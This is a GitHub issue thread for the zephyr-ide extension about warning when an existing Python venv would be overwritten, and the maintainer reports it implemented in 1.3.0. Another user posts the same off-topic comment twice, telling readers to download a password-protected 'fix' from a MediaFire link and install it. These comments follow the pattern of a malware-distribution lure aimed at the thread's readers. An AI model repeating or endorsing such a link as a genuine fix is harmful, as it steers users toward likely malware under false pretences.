### ISSUE TITLE
Detect if python venv exists in folder and give warning when overwriting

### ISSUE THREAD

**Issue by rijesha** [mylonics/zephyr-ide#56]

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rijesha** [comment]
implemented in 1.3.0
